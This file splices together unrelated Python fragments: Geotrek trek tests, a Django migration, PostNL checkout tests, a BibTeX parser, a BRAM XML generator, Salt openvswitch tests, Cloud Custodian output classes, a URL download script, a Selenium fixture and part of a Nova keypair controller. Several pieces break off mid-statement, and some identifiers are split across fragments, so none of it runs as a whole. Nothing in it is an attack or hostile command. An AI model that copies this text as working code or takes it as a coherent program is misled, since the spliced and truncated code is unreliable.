self.assertEqual([self.poi3, self.poi1, self.poi2], list(pois)) @skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only')
def test_pois_is_not_ordered_by_progression(self): self.trek = TrekFactory.create(geom=LineString((0, 0)
, (8, 8))) self.trek_reverse = TrekFactory.create(geom=LineString((6.4, 6.4), (0.8, 0.8))) self.poi1 = POIFactory.create(geom=Point(3.2, 3.2)) self.poi2 = POIFactory.create(geom=Point(1.2, 1.2)) self.poi3 = POIFactory.create(geom=Point(4, 4)) pois = self.trek.pois self.assertCountEqual([self.poi1, self.poi2, self.poi3], pois) pois = self.trek_reverse.pois self.assertCountEqual([self.poi1, self.poi2, self.poi3], pois) @skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only') def test_city_departure(self): p1 = PathFactory.create(geom=LineString((0, 0), (5, 5))) trek = TrekFactory.create(paths=[p1]) self.assertEqual(trek.city_departure, '') city1 = CityFactory.create(geom=MultiPolygon(Polygon(((-1, -1), (3, -1), (3, 3), (-1, 3), (-1, -1))))) city2 = CityFactory.create(geom=MultiPolygon(Polygon(((3, 3), (9, 3), (9, 9), (3, 9), (3, 3))))) self.assertEqual([city for city in trek.cities], [city1, city2]) self.assertEqual(trek.city_departure, str(city1)) @skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only') def test_city_departure_nds(self): trek = TrekFactory.create(geom=LineString((0, 0), (5, 5))) self.assertEqual(trek.city_departure, '') city1 = CityFactory.create(geom=MultiPolygon(Polygon(((-1, -1), (3, -1), (3, 3), (-1, 3), (-1, -1))))) city2 = CityFactory.create(geom=MultiPolygon(Polygon(((3, 3), (9, 3), (9, 9), (3, 9), (3, 3))))) self.assertEqual([city for city in trek.cities], [city1, city2]) self.assertEqual(trek.city_departure, str(city1)) class TrekUpdateGeomTest(TestCase): @classmethod def setUpTestData(cls): cls.trek = TrekFactory.create(published=True, geom=LineString(((700000, 6600000), (700100, 6600100)), srid=2154)) def test_save_with_same_geom(self): geom = LineString(((700000, 6600000), (700100, 6600100)), srid=2154) self.trek.geom = geom self.trek.save() retrieve_trek = Trek.objects.get(pk=self.trek.pk) self.assertTrue(retrieve_trek.geom.equals_exact(geom, tolerance=0.00001)) def test_save_with_another_geom(self): geom = LineString(((-7, -7), (5, -7), (5, 5), (-7, 5), (-7, -7)), srid=2154) self.trek.geom = geom self.trek.save() retrieve_trek = Trek.objects.get(pk=self.trek.pk) if settings.TREKKING_TOPOLOGY_ENABLED: self.assertFalse(retrieve_trek.geom.equals_exact(geom, tolerance=0.00001)) else: self.assertTrue(retrieve_trek.geom.equals_exact(geom, tolerance=0.00001)) def test_save_with_provided_one_field_exclusion(self): self.trek.save(update_fields=['geom']) self.assertTrue(self.trek.pk) def test_save_with_multiple_fields_exclusion(self): new_trek = TrekFactory.create() new_trek.description_en = 'Description Test update' new_trek.ambiance = 'Very special ambiance, for test purposes.' 
new_trek.save(update_fields=['description_en']) db_trek = Trek.objects.get(pk=new_trek.pk) self.assertTrue(db_trek.pk) self.assertEqual(db_trek.description_en, 'Description Test update') self.assertNotEqual(db_trek.ambiance, 'Very special ambiance, for test purposes.') new_trek.save(update_fields=['ambiance_en']) db_trek = Trek.objects.get(pk=new_trek.pk) self.assertEqual(db_trek.ambiance_en, 'Very special ambiance, for test purposes.') class TrekItinerancyTest(TestCase): def test_next_previous(self): trekA = TrekFactory(name="A") trekB = TrekFactory(name="B") trekC = TrekFactory(name="C") trekD = TrekFactory(name="D") OrderedTrekChild(parent=trekC, child=trekA, order=42).save() OrderedTrekChild(parent=trekC, child=trekB, order=15).save() OrderedTrekChild(parent=trekD, child=trekA, order=1).save() self.assertEqual(list(trekA.children_id), []) self.assertEqual(list(trekB.children_id), []) self.assertEqual(list(trekC.children_id), [trekB.id, trekA.id]) self.assertEqual(list(trekD.children_id), [trekA.id]) self.assertEqual(trekA.next_id, {trekC.id: None, trekD.id: None}) self.assertEqual(trekB.next_id, {trekC.id: trekA.id}) self.assertEqual(trekC.next_id, {}) self.assertEqual(trekD.next_id, {}) self.assertEqual(trekA.previous_id, {trekC.id: trekB.id, trekD.id: None}) self.assertEqual(trekB.previous_id, {trekC.id: None}) self.assertEqual(trekC.previous_id, {}) self.assertEqual(trekD.previous_id, {}) def test_delete_child(self): trekA = TrekFactory(name="A") trekB = TrekFactory(name="B") trekC = TrekFactory(name="C") OrderedTrekChild(parent=trekA, child=trekB, order=1).save() OrderedTrekChild(parent=trekA, child=trekC, order=2).save() self.assertTrue(OrderedTrekChild.objects.filter(child=trekB).exists()) self.assertQuerysetEqual(trekA.children, ['<Trek: B>', '<Trek: C>']) self.assertQuerysetEqual(trekB.parents, ['<Trek: A>']) self.assertQuerysetEqual(trekC.parents, ['<Trek: A>']) self.assertEqual(list(trekA.children_id), [trekB.id, trekC.id]) self.assertEqual(trekB.parents_id, [trekA.id]) self.assertEqual(trekC.parents_id, [trekA.id]) trekB.delete() self.assertEqual(trekC.previous_id_for(trekA), None) self.assertEqual(trekC.next_id_for(trekA), None) self.assertEqual(trekC.next_id, {trekA.id: None}) self.assertEqual(trekC.previous_id, {trekA.id: None}) self.assertFalse(OrderedTrekChild.objects.filter(child=trekB).exists()) self.assertQuerysetEqual(trekA.children, ['<Trek: C>']) self.assertQuerysetEqual(trekC.parents, ['<Trek: A>']) self.assert
# -*- coding: utf-8 -*- # Generated by Django 1.9.7 on 2016-06-20 23:54 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.
deletion class Migration(migrations.Migration): dependencies = [ ('authentication', '0003_aut
o_20160620_2027'), ('feed', '0005_auto_20160620_1547'), ] operations = [ migrations.AddField( model_name='post', name='author', field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='posts', to='authentication.Profile'), preserve_default=False, ), ]
ort HTTMock from django_dynamic_fixture import G, N from postnl_checkout.contrib.django_postnl_checkout.models import Order from .base import PostNLTestMixin class OrderTests(PostNLTestMixin, TestCase): """ Tests for Order model. """ maxDiff = None def setUp(self): super(OrderTests, self).setUp() self.order_datum = datetime.datetime( year=2011, month=7, day=21, hour=20, minute=11, second=0 ) self.verzend_datum = datetime.datetime( year=2011, month=7, day=22, hour=20, minute=11, second=0 ) def test_save(self): """ Test saving an Order model. """ instance = N(Order) instance.clean() instance.save() def test_prepare_order(self): """ Test prepare_order class method. """ # Setup mock response def response(url, request): self.assertXMLEqual( request.body, self.read_file('prepare_order_request.xml') ) return self.read_file('prepare_order_response.xml') kwargs = { 'AangebodenBetaalMethoden': { 'PrepareOrderBetaalMethode': { 'Code': 'IDEAL', 'Prijs': '5.00' } }, 'AangebodenCommunicatieOpties': { 'PrepareOrderCommunicatieOptie': { 'Code': 'NEWS' } }, # FIXME: the following is not submitted by SUDS # Most probably because it is not properly defined in the WSDL # Contact PostNL about this. # 'AangebodenOpties': { # 'PrepareOrderOptie': { # 'Code': 'WRAP', # 'Prijs': '2.50' # } # }, # 'AfleverOpties': { # 'AfleverOptie': { # 'Code': 'PG', # 'Kosten': '0.00', # 'Toegestaan': True # } # }, 'Consument': { 'ExtRef': 'test@e-id.nl' }, 'Contact': { 'Url': 'http://www.kadowereld.nl/url/contact' }, 'Order': { 'ExtRef': '1105_900', 'OrderDatum': self.order_datum, 'Subtotaal': '125.00', 'VerzendDatum': self.verzend_datum, 'VerzendKosten': '12.50' }, 'Retour': { 'BeschrijvingUrl': 'http://www.kadowereld.nl/url/beschrijving', 'PolicyUrl': 'http://www.kadowereld.nl/url/policy', 'RetourTermijn': 28, 'StartProcesUrl': 'http://www.kadowereld.nl/url/startproces' }, 'Service': { 'Url': 'http://www.kadowereld.nl/url/service' } } # Execute API call with HTTMock(response): instance = Order.prepare_order(**kwargs) # Assert model field values self.assertTrue(instance.pk) self.assertEquals( instance.order_token, '0cfb4be2-47cf-4eac-865c-d66657953d5c' ) self.assertEquals( instance.order_ext_ref, '1105_900' ) self.assertEquals( instance.order_date, self.order_datum ) # Assert JSON values self.assertEquals(instance.prepare_order_request, kwargs) self.assertEquals(instance.prepare_order_response, { 'Checkout': { 'OrderToken': '0cfb4be2-47cf-4eac-865c-d66657953d5c', 'Url': ( 'http://tpppm-test.e-id.nl/Orders/OrderCheckout' '?token=0cfb4be2-47cf-4eac-865c-d66657953d5c' ) }, 'Webshop': { 'IntRef': 'a0713e4083a049a996c302f48bb3f535' } }) def test_read_order(self): """ Test read_order method. """ # Setup mock response def response(url, request): self.assertXMLEqual( request.body, self.read_file('read_order_request.xml') ) return self.read_file('read_order_response.xml') instance = G( Order, order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c' ) # Read order data with HTTMock(response): new_instance = instance.read_order() response_data = new_instance.read_order_response self.assertTrue(response_data) self.assertEquals(response_data, { 'Voorkeuren': { 'Bezorging': { 'Tijdvak': { 'Start': u'10:30', 'Eind': u'08:30' }, 'Datum': datetime.datetime(2012, 4, 26, 0, 0) } },
'Consument': { 'GeboorteDatum': datetime.datetime(1977, 6, 15, 0, 0), 'ExtRef'
: u'jjansen', 'TelefoonNummer': u'06-12345678', 'Email': u'j.jansen@e-id.nl' }, 'Facturatie': { 'Adres': { 'Huisnummer': u'1', 'Initialen': u'J', 'Geslacht': u'Meneer', 'Deurcode': None, 'Gebruik': u'P', 'Gebouw': None, 'Verdieping': None, 'Achternaam': u'Jansen', 'Afdeling': None, 'Regio': None, 'Land': u'NL', 'Wijk': None, 'Postcode': u'4131LV', 'Straat': 'Lage Biezenweg', 'Bedrijf': None, 'Plaats': u'Vianen', 'Tussenvoegsel': None, 'Voornaam': u'Jan', 'HuisnummerExt': None } }, 'Webshop': { 'IntRef': u'a0713e4083a049a996c302f48bb3f535' }, 'CommunicatieOpties': { 'ReadOrderResponseCommunicatieOptie': [ { 'Text': u'Do not deliver to neighbours', 'Code': u'REMARK' } ] }, 'Bezorging': { 'ServicePunt': { 'Huisnummer': None, 'Initialen': None, 'Geslacht': None, 'Deurcode': None, 'Gebruik': None, 'Gebouw': None, 'Verdieping': None, 'Achternaam': None, 'Afdeling': None, 'Regio': None, 'Land': None, 'Wijk': None, 'Postcode': None, 'Straat': None, 'Bedrijf': None, 'Plaats': None, 'Tussenvoegsel': None, 'Voornaam': None, 'HuisnummerExt': None }, 'Geadresseerde': { 'Huisnummer': u'1', 'Initialen': u'J', 'Geslacht': u'Meneer', 'Deurcode': None, 'Gebruik': u'Z', 'Gebouw': None, 'Verdieping': None, 'Achternaam': u'Janssen', 'Afdeling': None, 'Regio': None, 'Land': u'NL', 'Wijk': None, 'Postcode': u'4131LV', 'Straat': u'Lage Biezenweg ', 'Bedrijf': u'E-ID', 'Plaats': u'Vianen', 'Tussenvoegsel': None, 'Voornaam': u'Jan', 'HuisnummerExt': None } }, 'Opties': { 'ReadOrderResponseOpties': [ { 'Text': u'Congratulat ions with your new foobar!',
# bibliography.py r''' Defines the BibItem() and Bibliography() classes (both sub-classed from Node) The Bibliography() object is initialized directly from a .bib file using the `bibtexparser` package. We use registry.ClassFactory for unlisted fields ''' import os import logging log = logging.getLogger(__name__) import re, bibtexparser from .registry import Class
Factory from .command import Command from .content import Text class BibItem(Command): def __init__(self, citation_key=None): Comman
d.__init__(self) self.citation_key = citation_key def __repr__(self): if self.citation_key: return '{}:{}({})'.format(self.genus, self.species, self.citation_key) return '{}:{}()'.format(self.genus, self.species) def harvard_dict(self): ''' Create a dictionary of fields required for harvard-style citations. Returns a dict of citation keys mapped onto bibliographic information in the correct format. The main difficulty is with the 'author' key. ''' bibtex_tags = ('title', 'author', 'year', 'publisher', 'isbn') harv = dict() surnames = list() initials = list() for child in self.children: # deal with author field if child.species == 'author': # split on # (1) authors: delimited by a comma (,) or an 'and', then # (2) names: delimited by a point (.) or a space author_str = child.content author_list = [x.split(' ') for x in re.split(',|and', author_str)] author_list = [[x.strip() for x in au if x] for au in author_list] for author in author_list: surnames.append(author[-1]) initials.append('.'.join([x[0] for x in author[:-1]]) + '.') names = ['%s, %s' % name for name in zip(surnames, initials)] harv['author'] = ' and '.join([', '.join(names[:-1]), names[-1]]) # copy bibtex (tag, content) pairs for tags in bibtex_fields else: if child.species in bibtex_tags: harv[child.species] = child.content # set citation text e.g. (Evans 2012) if len(surnames) == 1: harv['citation'] = '(%s, %s)' % (surnames[0], harv['year']) elif len(surnames) == 2: harv['citation'] = '(%s & %s, %s)' % (surnames[0], surnames[1], harv['year']) elif len(surnames) > 3: harv['citation'] = '(%s et al. %s)' % (surnames[0], harv['year']) return harv def harvard(self): ''' print harvard-style item (should be done in a template!) ''' title = '' author = '' year = '' publisher = '' for child in self.children: if child.species == 'title': title = child.content elif child.species == 'author': author_str = child.content auth_list = [x.split('.') for x in re.split(',|and', author_str)] auth_list = [[x.strip() for x in au] for au in auth_list] auth_parts = [] for auth in auth_list: name = auth[-1] + ' ' + '.'.join([x[0] for x in auth[:-1]]) + '.' auth_parts.append(name) author = ' and '.join([', '.join(auth_parts[:-1]), auth_parts[-1]]) elif child.species == 'year': year = child.content elif child.species == 'publisher': publisher = child.content else: pass return '%s (%s) %s. %s.' % (author, year, title, publisher) class Bibliography(Command): r''' Bibliography is block command, whose `children` is a list of BibItem objects. This is an example of a Command whicl logically encloses what follows. The data is read from a .bib file then parsed into a dictionary by the `bibtexparser` package. At the moment it can only pull contents from a single bib file whereas the command allows for \bibliography{refs1.bib, refs2.bib} etc. 
    '''
    def __init__(self, bibtex_filename=None, LATEX_ROOT=None):
        Command.__init__(self)
        self.filename = bibtex_filename
        if bibtex_filename:
            if LATEX_ROOT:
                bibtex_filename = os.path.join(LATEX_ROOT, bibtex_filename)
            self.read_bibtex_file(bibtex_filename)

    def read_bibtex_file(self, bibtex_filename):
        if not bibtex_filename[-4:] == '.bib':
            bibtex_filename = bibtex_filename + '.bib'
        try:
            with open(bibtex_filename) as bibtex_file:
                chars = bibtex_file.read()
        except FileNotFoundError as e:
            raise Exception('Bibtex file \'{}\' not found'.format(e.filename))

        # call bibtexparser
        bibtex_db = bibtexparser.loads(chars)
        for entry in bibtex_db.entries:
            bibitem = BibItem()
            for key, val in entry.items():
                if key == 'ID':
                    bibitem.citation_key = val
                else:
                    node = ClassFactory(str(key), [], BaseClass=Text)()
                    node.content = val
                    bibitem.append_child(node)
            self.append_child(bibitem)

    def chars(self):
        '''
        The raw format is the original command "\bibliography{refs.bib}"
        We are not testing bibtexparser!
        '''
        return r'\bibliography{{{}}}{}'.format(self.filename, self.post_space)

    def add_item(self, bibitem):
        if not isinstance(bibitem, BibItem):
            raise Exception('Bibliography objects can only contain BibItem objects')
        self.children.append(bibitem)

    def harvard(self):
        ''' string harvard entries together '''
        return '\n'.join([x.harvard() for x in self.children])


def test_bibtex():
    bibtex_filename = './test_docs/test_article/references.bib'
    bib = Bibliography(bibtex_filename)
    print(bib.pretty_print())
    print(bib.harvard())
    print(bib.chars())


if __name__ == '__main__':
    test_bibtex()
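# Illustrative sketch, not part of bibliography.py above: a minimal,
# self-contained look at what bibtexparser hands back to read_bibtex_file().
# Each entry is a plain dict whose 'ID' key becomes the citation key and whose
# remaining keys become child Text nodes. The sample entry below is made up.
import bibtexparser

sample = """
@book{evans2012,
  title     = {An Example Book},
  author    = {John A. Evans},
  year      = {2012},
  publisher = {Example Press}
}
"""

db = bibtexparser.loads(sample)
for entry in db.entries:
    print(entry['ID'], {k: v for k, v in entry.items() if k != 'ID'})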
import yaml header=""" <?x
ml version="1.0" encoding="UTF-8"?> <MemInfo Version="1" Minor="
0"> <Processor Endianness="Little" InstPath="design/cortex"> <AddressSpace Name="design_1_i_microblaze_0.design_1_i_microblaze_0_local_memory_dlmb_bram_if_cntlr" Begin="0" End="8191"> <BusBlock> """ footer=""" </BusBlock> </AddressSpace> </Processor> <Config> <Option Name="Part" Val="xc7a35tcsg324-1"/> </Config> </MemInfo> """ bitlane=""" <BitLane MemType="{type}" Placement="{placement}"> <DataWidth MSB="{msb}" LSB="{lsb}"/> <AddressRange Begin="0" End="{end_address}"/> <Parity ON="false" NumBits="0"/> </BitLane> """ remap = [3,2,1,0,7,6,5,4,11,10,9,8,15,14,13,12] bram = open("bram.yaml", "r") doc = yaml.load(bram) bit_pos = 0 bit_width = 2 output = header # for bram in doc['bram']: for i in range(len(doc['bram'])): bram = doc['bram'][remap[i]] data = dict() # print bram data['lsb'] = bit_pos data['msb'] = bit_pos + bit_width - 1 data['end_address'] = 16383 data['type'] = 'RAMB36E1' data['placement'] = bram['SITE'].split('_')[1] # remove RAMB36_ in front of the position string bit_pos += bit_width output += bitlane.format(**data) output += footer print output
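# Illustrative sketch, not part of the script above: the shape of "bram.yaml"
# that the loop appears to assume, i.e. a top-level 'bram' list of 16 records
# whose 'SITE' value looks like "RAMB36_<placement>". The concrete site names
# below are made up; only the key names come from the script.
import yaml

sample_doc = {
    'bram': [{'SITE': 'RAMB36_X0Y{}'.format(i)} for i in range(16)]
}
print(yaml.safe_dump(sample_doc, default_flow_style=False))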
import pytest import salt.states.openvswitch_port as openvswitch_port from tests.support.mock import MagicMock, patch @pytest.fixture def configure_loader_modules(): return {openvswitch_port: {"__opts__": {"test": False}}} def test_present(): """ Test to verify that the named port exists on bridge, eventually creates it. """ name = "salt" bridge = "br-salt" ret = {"name": name, "result": None, "comment": "", "changes": {}} mock = MagicMock(return_value=True) mock_l = MagicMock(return_value=["salt"]) mock_n = MagicMock(return_value=[]) with patch.dict( openvswitch_port.__salt__, { "openvswitch.bridge_exists": mock, "openvswitch.interface_get_type": MagicMock(return_value='""'), "openvswitch.port_list": mock_l, }, ): comt = "Port salt already exists." ret.update({"comment": comt, "result": True}) assert openvswitch_port.present(name, bridge) == ret with patch.dict( openvswitch_port.__salt__, { "openvswitch.bridge_exists": mock, "openvswitch.interface_get_type": MagicMock(return_value='""'), "openvswitch.port_list": mock_n, "openvswitch.port_add": mock, }, ): comt = "Port salt created on bridge br-salt." ret.update( { "comment": comt, "result": True, "changes": { "salt": { "new": "Created port salt
on bridge br-salt.", "old": "No port named salt present.", }, }, } ) assert openvswitch_port.present(name, bridge) == ret with patch.dict( openvswitch_port.__salt__, { "openvswitch.bridge_exists": mock, "
openvswitch.port_list": mock_n, "openvswitch.port_add": mock, "openvswitch.interface_get_options": mock_n, "openvswitch.interface_get_type": MagicMock(return_value=""), "openvswitch.port_create_gre": mock, "dig.check_ip": mock, }, ): comt = "Port salt created on bridge br-salt." ret.update( { "result": True, "comment": ( "Created GRE tunnel interface salt with remote ip 10.0.0.1 and key" " 1 on bridge br-salt." ), "changes": { "salt": { "new": ( "Created GRE tunnel interface salt with remote ip 10.0.0.1" " and key 1 on bridge br-salt." ), "old": ( "No GRE tunnel interface salt with remote ip 10.0.0.1 and" " key 1 on bridge br-salt present." ), }, }, } ) assert ( openvswitch_port.present( name, bridge, tunnel_type="gre", id=1, remote="10.0.0.1" ) == ret )
# Handy for debugging setup.py
"""Utilities creating reusable, DRY, setup.py installation scripts

Typical usage in setup.py:

>>> global_env, local_env = {}, {}
>>> execfile(join('pug', 'setup_util.py'), global_env, local_env)
>>> get_variable = local_env['get_variable']
"""
import os


def setup(*args, **kwargs):
    print('setup() args = {0}'.format(args))
    print('setup() kwargs = {0}'.format(kwargs))


def get_variable(relpath, keyword='__version__'):
    """Read __version__ or other properties from a python file without importing it

    from gist.github.com/technonik/406623 but with added keyword kwarg
    """
    for line in open(os.path.join(os.path.dirname(__file__), relpath), encoding='cp437'):
        if keyword in line:
            if '"' in line:
                return line.split('"')[1]
            elif "'" in line:
                return line.split("'")[1]
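# Illustrative sketch, not part of the utilities above: a self-contained check
# of get_variable(). It writes a throwaway module next to this file, reads its
# __version__ back, then removes it; the module name and version string are
# made up for the demonstration.
if __name__ == '__main__':
    demo_name = '_setup_util_demo.py'
    demo_path = os.path.join(os.path.dirname(__file__), demo_name)
    with open(demo_path, 'w') as fh:
        fh.write('__version__ = "1.2.3"\n')
    try:
        print(get_variable(demo_name))  # expected output: 1.2.3
    finally:
        os.remove(demo_path)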
permissions = ("cloudWatch:PutMetricData",) retry = staticmethod(get_retry(('Throttling',))) BUFFER_SIZE = 20 @staticmethod def select(metrics_selector): if not metrics_selector: return NullMetricsOutput # Compatibility for boolean configuration if isinstance(metrics_selector, bool): metrics_selector = 'aws' for k in metrics_outputs.keys(): if k.startswith(metrics_selector): return metrics_outputs[k] raise ValueError("invalid metrics option %r" % metrics_selector) def __init__(self, ctx, namespace=DEFAULT_NAMESPACE): self.ctx = ctx self.namespace = namespace self.buf = [] def get_timestamp(self): """ Now, if C7N_METRICS_TZ is set to TRUE, UTC timestamp will be used. For backwards compatibility, if it is not set, UTC will be the default. To disable this and use the system's time zone, C7N_METRICS_TZ shoule be set to FALSE. """ if os.getenv("C7N_METRICS_TZ", 'TRUE').upper() in ('TRUE', ''): return datetime.datetime.utcnow() else: return datetime.datetime.now() def flush(self): if self.buf: self._put_metrics(self.namespace, self.buf) self.buf = [] def put_metric(self, key, value, unit, buffer=True, **dimensions): point = self._format_metric(key, value, unit, dimensions) self.buf.append(point) if buffer: # Max metrics in a single request if len(self.buf) == 20: self.flush() else: self.flush() def _format_metric(self, key, value, unit, dimensions): d = { "MetricName": key, "Timestamp": self.get_timestamp(), "Value": value, "Unit": unit} d["Dimensions"] = [ {"Name": "Policy", "Value": self.ctx.policy.name}, {"Name": "ResType", "Value": self.ctx.policy.resource_type}] for k, v in dimensions.items(): d['Dimensions'].append({"Name": k, "Value": v}) return d def _put_metrics(self, ns, metrics): watch = local_session(self.ctx.session_factory).client('cloudwatch') for metric_values in chunks(metrics, self.BUFFER_SIZE): return self.retry( watch.put_metric_data, Namespace=ns, MetricData=metrics) class NullMetricsOutput(MetricsOutput): permissions = () def __init__(self, ctx, namespace=DEFAULT_NAMESPACE): super(NullMetricsOutput, self).__init__(ctx, namespace) self.data = [] def _put_metrics(self, ns, metrics): self.data.append({'Namespace': ns, 'MetricData': metrics}) for m in metrics: if m['MetricName'] not in ('ActionTime', 'ResourceTime'): log.debug(self.format_metric(m)) def format_metric(self, m): label = "metric:%s %s:%s" % (m['MetricName'], m['Unit'], m['Value']) for d in m['Dimensions']: label += " %s:%s" % (d['Name'].lower(), d['Value'].lower()) return label class LogOutput(object): log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' def __init__(self, ctx): self.ctx = ctx def get_handler(self): raise NotImplementedError() def __enter__(self): log.debug("Storing output with %s" % repr(self)) self.join_log() return self def __exit__(self, exc_type=None, exc_value=None, exc_traceback=None): self.leave_log() if exc_type is not None: log.exception("Error while executing policy") def join_log(self): self.handler = self.get_handler() self.handler.setLevel(logging.DEBUG) self.handler.setFormatter(logging.Formatter(self.log_format)) mlog = logging.getLogger('custodian') mlog.addHandler(self.handler) def leave_log(self): mlog = logging.getLogger('custodian') mlog.removeHandler(self.handler) self.handler.flush() self.handler.close() class CloudWatchLogOutput(LogOutput): log_format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s' def get_handler(self): return CloudWatchLogHandler( log_group=self.ctx.options.log_group, log_stream=self.ctx.policy.name, session_factory=lambda x=None: 
self.ctx.session_factory( assume=False)) def __repr__(self): return "<%s to group:%s stream:%s>" % ( self.__class__.__name__, self.ctx.options.log_group, self.ctx.policy.name) class FSOutput(LogOutput): @staticmethod def select(path): for k in blob_outputs.keys(): if path.startswith('%s://' % k): return blob_outputs[k] # Fall back local disk return blob_outputs['file'] @staticmethod def join(*parts): return os.path.join(*parts) def __init__(self, ctx): super(FSOutput, self).__init__(ctx) self.root_dir = self.ctx.output_path or tempfile.mkdtemp() def get_handler(self): return logging.FileHandler( os.path.join(self.root_dir, 'custodian-run.log')) def compress(self): # Compress files individually so thats easy to walk them, without # downloading tar and extracting. for root, dirs, files in os.walk(self.root_dir): for f in files: fp = os.path.join(root, f) with gzip.open(fp + ".gz", "wb", compresslevel=7) as zfh: with open(fp, "rb") as sfh: shutil.copyfileobj(sfh, zfh, length=2**15) os.remove(fp) @blob_outputs.register('file') class DirectoryOutput(FSOutput): permissions = () def __init__(self, ctx): super(DirectoryOutput, self).__init__(ctx) if self.root_dir.startswith('file://'): self.root_dir = self.root_dir[len('file://'):] if self.ctx.output_path is not None: if not os.path.exists(self.root_dir): os.makedirs(self.root_dir) def __repr__(self): return "<%s to dir:%s>" % (self.__class__.__name__, self.root_dir) @blob_outputs.register('s3') class S3Output(FSOutput): """ Usage: .. code-block:: python with S3Output(session_factory, 's3://bucket/prefix'): log.info('xyz') # -> log messages sent to custodian-run.log.gz """ permissions = ('S3:PutObject',) def __init__(self, ctx): super(S3Output, self).__init__(ctx) self.date_path = datetime.datetime.now().strftime('%Y/%m/%d/%H') self.s3_path, self.bucket, self.key_prefix = parse_s3( self.ctx.output_path) self.root_dir = tempfile.mkdtemp() self.transfer = None def __repr__(self): return "<%s to bucket:%s prefix:%s>" % ( self.__class__.__name__, self.bucket, "%s/%s" % (self.key_prefix, self.date_path)) @staticmethod def join(*parts): return "/".join([s.strip('/') for s in parts]) def __exit__(self, exc_type=None, exc_value=None, exc_traceback=None): from boto3.s3.transfer import S3Transfer, TransferConfig if exc_type is not None: log.exception("Error while executing policy") log.debug("Uploading policy logs") self.leave_log() self.compress() self.transfer = S3Transfer( self.ctx.session_factory(assume=False).client('s3'), config=TransferConfig(use_threads=False)) self.upload() shutil.rmtree(self.root_dir) log.debug("Policy Logs uploaded") def upload(self): for root, dirs, files in os.walk(self.root_dir):
for f in files: key = "%s/%s%s" % ( self.key_prefix, self.date_path, "%s/%s" % ( root[len(self.root_dir):], f)) key = key.strip('/') self.transfer.
upload_file( os.path.join(root, f), sel
#!/usr/bin/env python
import sys

urllib_urlretrieve = None
try:
    # Python 3.x or later
    import urllib.request
    urllib_urlretrieve = urllib.request.urlretrieve
except ImportError:
    # Python 2.x
    import urllib
    urllib_urlretrieve = urllib.urlretrieve


def download(url, target_path):
    urllib_urlretrieve(url, target_path)


if __name__ == '__main__':
    if len(sys.argv) != 3:
        print('Usage: python %s url target_path' % sys.argv[0])
        sys.exit()
    url = sys.argv[1]
    target_path = sys.argv[2]
    download(url, target_path)
from selenium import webdriver from fixture.session import SessionHelper from fixture.group import GroupHelper from fixture.contact import Cont
actHelper class Application: def __init__(self, browser, base_url): if browser == "firefox": self.wd = webdriver.Firefox(capabilities={"marionette": False}, firefox_binary="C:/Program Files/Mozilla Firefox/firefox.exe") elif browser == "chrome": self.wd = webdriver.Chrome() elif browser == "ie": self.wd = webdriver.Ie() else:
raise ValueError("Unrecognized browser %s" % browser) self.session = SessionHelper(self) self.group = GroupHelper(self) self.contact = ContactHelper(self) self.base_url = base_url def is_valid(self): try: self.wd.current_url return True except: return False def open_homepage(self): wd = self.wd if not wd.current_url.endswith("addressbook/"): wd.get(self.base_url) def destroy(self): self.wd.quit()
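# Illustrative sketch, not part of application.py above: one common way to wire
# the Application class into pytest via a conftest.py. The import path, browser
# choice and base URL are assumptions for the example only.
import pytest

from fixture.application import Application


@pytest.fixture(scope="session")
def app(request):
    fixture = Application(browser="firefox", base_url="http://localhost/addressbook/")
    request.addfinalizer(fixture.destroy)
    return fixture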
nova.policies import keypairs as kp_policies class KeypairController(wsgi.Controller): """Keypair API controller for the OpenStack API.""" _view_builder_class = keypairs_view.ViewBuilder def __init__(self): super(KeypairController, self).__init__() self.api = compute_api.KeypairAPI() @wsgi.Controller.api_version("2.10") @wsgi.response(201) @wsgi.expected_errors((400, 403, 409)) @validation.schema(keypairs.create_v210) def create(self, req, body): """Create or import keypair. A policy check restricts users from creating keys for other users params: keypair object with: name (required) - string public_key (optional) - string type (optional) - string user_id (optional) - string """ # handle optional user-id for admin only user_id = body['keypair'].get('user_id') return self._create(req, body, key_type=True, user_id=user_id) @wsgi.Controller.api_version("2.2", "2.9") # noqa @wsgi.response(201) @wsgi.expected_errors((400, 403, 409)) @validation.schema(keypairs.create_v22) def create(self, req, body): # noqa """Create or import keypair. Sending name will generate a key and return private_key and fingerprint. Keypair will have the type ssh or x509, specified by type. You can send a public_key to add an existing ssh/x509 key. params: keypair object with: name (required) - string public_key (optional) - string type (optional) - string """ return self._create(req, body, key_type=True) @wsgi.Controller.api_version("2.1", "2.1") # noqa @wsgi.expected_errors((400, 403, 409)) @validation.schema(keypairs.create_v20, "2.0", "2.0") @validation.schema(keypairs.create, "2.1", "2.1") def create(self, req, body): # noqa """Create or import keypair. Sending name will generate a key and return private_key and fingerprint. You can send a public_key to add an existing ssh key. 
params: keypair object with: name (required) - string public_key (optional) - string """ return self._create(req, body) def _create(self, req, body, user_id=None, key_type=False): context = req.environ['nova.context'] params = body['keypair'] name = common.normalize_name(params['name']) key_type_value = params.get('type', keypair_obj.KEYPAIR_TYPE_SSH) user_id = user_id or context.user_id context.can(kp_policies.POLICY_ROOT % 'create', target={'user_id': user_id}) return_priv_key = False try: if 'public_key' in params: keypair = self.api.import_key_pair( context, user_id, name, params['public_key'], key_type_value) else: keypair, private_key = self.api.create_key_pair( context, user_id, name, key_type_value) keypair['private_key'] = private_key return_priv_key = True except exception.KeypairLimitExceeded as e: raise webob.exc.HTTPForbidden(explanation=str(e)) except exception.InvalidKeypair as exc: raise webob.exc.HTTPBadRequest(explanation=exc.format_message()) except exception.KeyPairExists as exc: raise webob.exc.HTTPConflict(explanation=exc.format_message()) return self._view_builder.create(keypair, private_key=return_priv_key, key_type=key_type) @wsgi.Controller.api_version("2.1", "2.1") @validation.query_schema(keypairs.delete_query_schema_v20) @wsgi.response(202) @wsgi.expected_errors(404) def delete(self, req, id): self._delete(req, id) @wsgi.Controller.api_version("2.2", "2.9") # noqa @validation.query_schema(keypairs.delete_query_schema_v20) @wsgi.response(204) @wsgi.expected_errors(404) def delete(self, req, id): # noqa self._delete(req, id) @wsgi.Controller.api_version("2.10") # noqa 